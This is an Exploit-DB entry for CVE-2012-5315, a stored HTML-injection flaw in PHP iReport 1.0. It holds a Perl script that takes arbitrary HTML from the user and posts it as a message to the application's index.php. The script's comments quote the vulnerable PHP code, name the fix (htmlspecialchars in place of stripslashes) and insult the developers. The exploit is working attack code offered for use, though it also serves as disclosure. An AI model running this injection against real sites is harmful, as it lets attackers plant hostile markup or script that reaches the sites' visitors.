PHP iReport 1.0 - Remote Html Code Injection

EDB-ID:

18402

CVE:

2012-5315

EDB Verified:

Author:

Or4nG.M4N

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2012-01-21

Vulnerable App:

#!/usr/bin/perl
########################################################################
# Title    = phpireport v1.0 => Remote Html Code injection
# Author   = Or4nG.M4n
# Download = http://garr.dl.sourceforge.net/project/phpireport/phpireport%20v1.0%20alpha%20revision%2025.rar
# Thnks :
# +----------------------------------+
# |   xSs m4n   i-Hmx   h311 c0d3    |
# |   Dr.Bnned ahwak2000 sa^Dev!L    |
# +----------------------------------+
#
#	                                 Html injection 
# vuln : messages_viewer.php
# vuln : home.php
# vuln : history.php
# code :
#	
#	echo "
#		<li>
#			<div class='post-details'><div style='float:left'>user: ".stripslashes($name)."</div> <div style='float:right'>".$time."</div></div>
#			<br>
#			<div class='post-details'>".stripslashes($message)."</div>
#		</li>
#	";
# How i can Fixed ..
# in all vuln file 
# Replace : stripslashes => Replace with => htmlspecialchars
# Thnks to All Stupid Coders 
#
use LWP::UserAgent;

print "Code to inject #";
my $inj = <STDIN>;
chomp $inj;
my $url = 'http://localhost/phpireport/index.php';

my $ua       = LWP::UserAgent->new();
my $response = $ua->post( $url, { 'message' => $inj } ); # Post <textarea rows='2' name='message' id='name'>&lt;/textarea&gt;
my $content  = $response->decoded_content();
print "\n done \n";

# The End

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services